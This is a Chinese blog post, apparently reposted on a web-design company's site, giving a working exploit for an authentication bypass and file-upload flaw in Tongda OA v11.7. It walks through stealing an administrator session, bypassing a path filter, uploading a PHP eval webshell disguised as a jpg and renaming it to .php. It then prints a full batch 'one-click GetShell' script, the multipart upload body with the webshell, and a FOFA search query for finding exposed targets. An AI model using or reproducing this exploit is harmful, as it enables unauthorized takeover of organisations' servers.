怎么實(shí)現(xiàn)通達(dá)OAv11.7在線(xiàn)用戶(hù)登錄漏洞復(fù)現(xiàn)
怎么實(shí)現(xiàn)通達(dá)OA v11.7 在線(xiàn)用戶(hù)登錄漏洞復(fù)現(xiàn),針對(duì)這個(gè)問(wèn)題,這篇文章詳細(xì)介紹了相對(duì)應(yīng)的分析和解答,希望可以幫助更多想解決這個(gè)問(wèn)題的小伙伴找到更簡(jiǎn)單易行的方法。
創(chuàng)新互聯(lián)建站成都企業(yè)網(wǎng)站建設(shè)服務(wù),提供網(wǎng)站制作、網(wǎng)站建設(shè)網(wǎng)站開(kāi)發(fā),網(wǎng)站定制,建網(wǎng)站,網(wǎng)站搭建,網(wǎng)站設(shè)計(jì),自適應(yīng)網(wǎng)站建設(shè),網(wǎng)頁(yè)設(shè)計(jì)師打造企業(yè)風(fēng)格網(wǎng)站,提供周到的售前咨詢(xún)和貼心的售后服務(wù)。歡迎咨詢(xún)做網(wǎng)站需要多少錢(qián):18980820575
通達(dá)OA v11.7 在線(xiàn)用戶(hù)登錄漏洞復(fù)現(xiàn)
一個(gè)類(lèi)似于越權(quán)的漏洞,但是利用的方式確實(shí)比較特殊
訪問(wèn)漏洞頁(yè)面獲取phpsession
http://x.x.x.x/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
可以看到我們已經(jīng)獲取到了phpsession,這個(gè)時(shí)候我們就可以訪問(wèn)他的后臺(tái)頁(yè)面了,但是如果頁(yè)面顯示RELOGIN說(shuō)明存在漏洞但是管理員現(xiàn)在不在線(xiàn),所以需要等他在線(xiàn)。
訪問(wèn)后臺(tái)頁(yè)面:
http://x.x.x.x/general/
查看本地的絕對(duì)路徑
新建一個(gè)附件目錄
這里需要注意:我們要添加一個(gè)路徑為系統(tǒng)目錄后面跟上webroot,但是webroot會(huì)被過(guò)濾,但是他沒(méi)有檢查大小寫(xiě),所以我們改為Webroot就可以輕松繞過(guò)。
添加圖片目錄
這里唯一需要注意的是我們需要將發(fā)布范圍里添加一個(gè)系統(tǒng)管理員,這樣子才可以,路徑的話(huà)呢還是webroot那個(gè)路徑。
上傳木馬
然后我們添加一個(gè)文件,也就是我們的shell
這里需要注意的是,我們需要將我們的木馬改為jpg后綴的,要不路徑無(wú)法查看。
查看木馬路徑
這個(gè)時(shí)候記住這個(gè)文件名稱(chēng),這個(gè)路徑是固定的就是file_folder/2013下面就是我們的木馬。
修改木馬后綴
回到我們之前的上傳頁(yè)面,然后點(diǎn)擊編輯。
鼠標(biāo)放到我們木馬上面,然后點(diǎn)擊重命名。
我們會(huì)打開(kāi)一個(gè)新的tab頁(yè)面,我們使用火狐進(jìn)行抓包:
先隨便改個(gè)名字,點(diǎn)擊保存,然后會(huì)攔截到一個(gè)post封包。
數(shù)據(jù)包格式大概是這個(gè)樣子:
NEW_FILE_NAME=166&CONTENT_ID=118&FILE_SORT=2&ATTACHMENT_ID=2925%402103_1578257970&ATTACHMENT_NAME_POSTFIX=jpg&ATTACHMENT_NAME=2.jpg&FIRST_ATTACHMENT_NAME=2&FILE_NAME_OLD=2.jpg
這個(gè)時(shí)候我們就需要修改ATTACHMENT_NAME_POSTFIX屬性為php.(注意后面有個(gè).)
然后重放這個(gè)數(shù)據(jù)包,就可以看到修改成功。
拼接木馬路徑
可以看到我們修改成功。
然后找到之前的文件名,然后將我們上傳的原始的文件名(2.jpg)改為(166.php),這個(gè)是根據(jù)你上傳的路徑以及改的名稱(chēng)來(lái)定的,然后路徑的話(huà)呢還是file_folder/2013,我們就可以訪問(wèn)到我們的馬子了。
一鍵GetShell腳本
腳本代碼:
#define payload = /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
#define yinhao = "
#define Rootre = <td nowrap class="TableData">(.*?)</td>
#define contentidre = "TableLine1" index="(.*?)" >
#define attachmentidre = ATTACHMENT_ID_OLD" value="(.*?),"
#define shellpathre = alt="(.*?)" node-image-tips
function GetCookie(url){
res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0");
if(StrFindStr(res[1],"PHPSESSID",0) == "-1"){
return "";
}
PHPSESSID = GettextMiddle(res[1],"PHPSESSID=",";");
return PHPSESSID;
}
function JudgeOK(url,Cookie){
res = HttpGet(url."/general/",Cookie);
if(StrFindStr(res[0],"/static/js/ba/agent.js",0) == "-1"){
return "0";
}else{
return "1";
}
}
function GetRoot(content){
list = StrRe(content,Rootre);
num = GetArrayNum(list);
num = num/2;
i = 0;
while(i<num){
if(StrFindStr(list[ToInt(i*2+1)],":\",0) != "-1"){
return list[ToInt(i*2+1)];
}
i = i+1;
}
return "";
}
function GetWebRoot(url,Cookie){
res = HttpGet(url."/general/system/reg_view/",Cookie);
return GetRoot(res[0]);
}
function AddPath(url,Root,Cookie){
return HttpPost(url."/general/system/attachment/position/add.php","POS_ID=166&POS_NAME=166&POS_PATH=".URLEncode(Root."\WebRoot")."&IS_ACTIVE=on",Cookie);
}
function AddImgPath(url,Root,Cookie){
return HttpPost(url."/general/system/picture/new/submit.php","TO_ID=&TO_NAME=&PRIV_ID=&PRIV_NAME=&COPY_TO_ID=admin%2C&COPY_TO_NAME=%CF%B5%CD%B3%B9%DC%C0%ED%D4%B1%2C&PIC_NAME=test&PIC_PATH=".URLEncode(Root."\webRoot")."&ROW_PIC=5&ROW_PIC_NUM=7",Cookie);
}
function PushImg(url,Content,Cookie){
return HttpPost(url."/general/file_folder/new/submit.php",Content,Cookie.StrRN()."Content-Type: multipart/form-data; boundary=---------------------------33072116513621237124579432636");
}
function GetPICID(url,Cookie){
res = HttpGet(url."/general/picture/tree.php?CUR_DIR=&PIC_ID=&_=1615284234507",Cookie);
return GettextMiddle(res[0],"&PIC_ID=",yinhao);
}
function GetImg(url,Root,Cookie){
res = HttpGet(url."/general/picture/picture_view.php?SUB_DIR=2103&PIC_ID=".GetPICID(url,Cookie)."&CUR_DIR=".URLEncode(StrReplace(Root,"\\","/"))."%2Fwebroot%2Ffile_folder%2F2103",Cookie);
list = StrRe(res[0],shellpathre);
num = GetArrayNum(list);
num = num/2;
i = 0;
while(i<num){
if(StrFindStr(list[ToInt(i*2+1)],"1.jpg",0) != "-1"){
return list[ToInt(i*2+1)];
}
i = i+1;
}
return "";
}
function ChangeImgName(url,CONTENT,ATTACHMENT,Cookie){
return HttpPost(url."/general/file_folder/rename_submit.php","NEW_FILE_NAME=166&CONTENT_ID=".CONTENT."&FILE_SORT=2&ATTACHMENT_ID=".URLEncode(ATTACHMENT)."&ATTACHMENT_NAME_POSTFIX=php.&ATTACHMENT_NAME=1.jpg&FIRST_ATTACHMENT_NAME=1&FILE_NAME_OLD=1.jpg",Cookie);
}
function GetCONTENTID(url,Cookie){
res = HttpGet(url."/general/file_folder/folder.php?FILE_SORT=2&SORT_ID=0",Cookie);
list = StrRe(res[0],contentidre);
if(GetArrayNum(list) >= 2){
return list[1];
}
return "";
}
function GetATTACHMENTID(url,CONTENTID,Cookie){
res = HttpGet(url."/general/file_folder/edit.php?FILE_SORT=2&SORT_ID=0&CONTENT_ID=".CONTENTID."&start=0",Cookie.StrRN()."Referer: ".url."/general/file_folder/folder.php?FILE_SORT=2&SORT_ID=0");
list = StrRe(res[0],attachmentidre);
if(GetArrayNum(list) >= 2){
return list[1];
}
return "";
}
function GetShell(url){
PHPSESSID = GetCookie(url);
if(PHPSESSID == ""){
return "";
}
Cookie = "Cookie: PHPSESSID=".PHPSESSID.";".StrRN()."User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0";
if(JudgeOK(url,Cookie)=="1"){
WebRoot = GetWebRoot(url,Cookie);
AddPath(url,WebRoot,Cookie);
AddImgPath(url,WebRoot,Cookie);
ShellPost = ReadFile("script\綜合漏洞\OAShell.txt");
PushImg(url,ShellPost,Cookie);
path = GetImg(url,WebRoot,Cookie);
CONTENTID = GetCONTENTID(url,Cookie);
ATTACHMENTID=GetATTACHMENTID(url,CONTENTID,Cookie);
ChangeImgName(url,CONTENTID,ATTACHMENTID,Cookie);
realshellpath = url."/file_folder/2103/".StrReplace(path,"1.jpg","166.php");
print("Shell路徑:",realshellpath,"密碼:test");
}else{
return "";
}
}
function main(args){
print("請(qǐng)輸入要要檢測(cè)的列表文件:");
list = StrSplit(ReadFile(input()),StrRN());
i = 0;
num = GetArrayNum(list);
while(i < num){
url=list[ToInt(i)];
print("當(dāng)前檢測(cè)的連接:".url);
GetShell(url);
i=i+1;
}
print("檢測(cè)完畢");
}OAShell.txt:
-----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="SUBJECT" 166.jpg -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="CONTENT_NO" -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="TD_HTML_EDITOR_CONTENT" -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="KEYWORD" -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="NEW_NAME" D??¨??μμ -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="NEW_TYPE" -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="ATTACHMENT_1"; filename="" Content-Type: application/octet-stream -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="ATTACH_NAME" -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="ATTACH_DIR" -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="DISK_ID" -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="ATTACHMENT_1000"; filename="" Content-Type: application/octet-stream -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="ATTACHMENT_DESC" -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="CONTENT_ID" -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="OP" -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="PD" 1 -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="SORT_ID" 0 -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="ATTACHMENT_ID_OLD" -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="ATTACHMENT_NAME_OLD" -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="FILE_SORT" 2 -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="USE_CAPACITY" -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="USE_CAPACITY_SIZE" -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="SHARE_USER" -----------------------------33072116513621237124579432636 Content-Disposition: form-data; name="ATTACHMENT_0"; filename="1.jpg" Content-Type: image/jpeg <?php @eval($_POST['test']); ?> -----------------------------33072116513621237124579432636--
放一張例子截圖:
附一個(gè)fofa語(yǔ)句:
app="TDXK-通達(dá)OA"
關(guān)于怎么實(shí)現(xiàn)通達(dá)OA v11.7 在線(xiàn)用戶(hù)登錄漏洞復(fù)現(xiàn)問(wèn)題的解答就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,如果你還有很多疑惑沒(méi)有解開(kāi),可以關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道了解更多相關(guān)知識(shí)。
分享名稱(chēng):怎么實(shí)現(xiàn)通達(dá)OAv11.7在線(xiàn)用戶(hù)登錄漏洞復(fù)現(xiàn)
URL地址:http://www.chinadenli.net/article2/isphoc.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供微信小程序、網(wǎng)站設(shè)計(jì)、網(wǎng)站排名、用戶(hù)體驗(yàn)、全網(wǎng)營(yíng)銷(xiāo)推廣、網(wǎng)站內(nèi)鏈
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話(huà):028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)
- 深圳網(wǎng)站制作用什么語(yǔ)言比較好 2022-06-15
- 手機(jī)網(wǎng)站制作的好處有哪些 2016-09-14
- 網(wǎng)站制作頁(yè)面優(yōu)化細(xì)節(jié)要注意哪些 2013-04-22
- 建設(shè)手機(jī)網(wǎng)站需要遵守哪些法則 2016-11-04
- 網(wǎng)站制作的未來(lái)發(fā)展趨勢(shì) 2021-11-02
- 網(wǎng)站制作前的注意事項(xiàng) 2021-10-16
- 影響網(wǎng)站排名的因素有哪些 2016-12-27
- 企業(yè)網(wǎng)站制作的作用有哪些? 2016-08-29
- 網(wǎng)站制作中如何做導(dǎo)航的布局設(shè)計(jì)? 2016-06-13
- 企業(yè)網(wǎng)站制作不要太拘泥于普通框架,隨心所欲提升企業(yè)品牌形象 2021-10-25
- 沈陽(yáng)網(wǎng)站制作-有哪些原因會(huì)導(dǎo)致網(wǎng)站備案失敗 2022-06-02
- 網(wǎng)站制作談網(wǎng)站更新原創(chuàng)文章的目的是什么? 2021-07-11